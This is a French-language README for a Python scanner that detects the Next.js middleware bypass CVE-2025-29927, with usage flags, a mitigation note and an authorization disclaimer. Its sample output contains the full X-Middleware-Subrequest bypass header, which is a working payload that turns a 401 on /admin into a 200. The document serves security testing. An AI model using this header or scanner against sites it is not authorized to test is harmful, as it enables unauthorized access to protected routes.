
Scanner de contournement du middleware Next.js
CVE-2025-29927 est un outil de sécurité spécialisé pour détecter la vulnérabilité de contournement du middleware Next.js (CVE-2025-29927) affectant les versions de Next.js 11.1.4 à 15.2.2. Cette vulnérabilité critique permet aux attaquants de contourner les contrôles de sécurité en envoyant un en-tête HTTP spécialement conçu.
La vulnérabilité de contournement du middleware Next.js (CVE-2025-29927) permet aux attaquants de contourner les contrôles d'autorisation en envoyant un en-tête X-Middleware-Subrequest malveillant qui confond la logique de traitement du middleware. Cela peut conduire à un accès non autorisé à des ressources et des routes protégées.
Score CVSS : 9.1 (Critique)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target : Cible unique à analyser (ex. example.com ou https://example.com)-f, --file : Fichier contenant la liste des cibles (une par ligne)-c, --concurrency : Nombre d'analyses concurrentes (par défaut : 5)-k, --insecure : Désactiver la vérification du certificat SSL (utile pour les adresses IP)-s, --silent : Mode silencieux - afficher uniquement les cibles vulnérablesAnalyser une seule cible :
python CVE-2025-29927.py -t example.com
Analyser plusieurs cibles à partir d'un fichier :
python CVE-2025-29927.py -f targets.txt
Analyser avec la vérification SSL désactivée :
python CVE-2025-29927.py -t 192.168.1.1 -k
Analyse automatisée en mode silencieux :
python CVE-2025-29927.py -f targets.txt -k -s
Analyser avec un en-tête personnalisé :
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Pour les cibles vulnérables, MiddleWay affiche :
Exemple de sortie :
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Pour atténuer cette vulnérabilité :
X-Middleware-Subrequest au niveau de votre WAF ou serveurCet outil est fourni à des fins de recherche en sécurité et de défense uniquement. Obtenez toujours une autorisation appropriée avant d'analyser des systèmes que vous ne possédez pas. Les auteurs ne sont pas responsables de toute mauvaise utilisation de cet outil.
MIT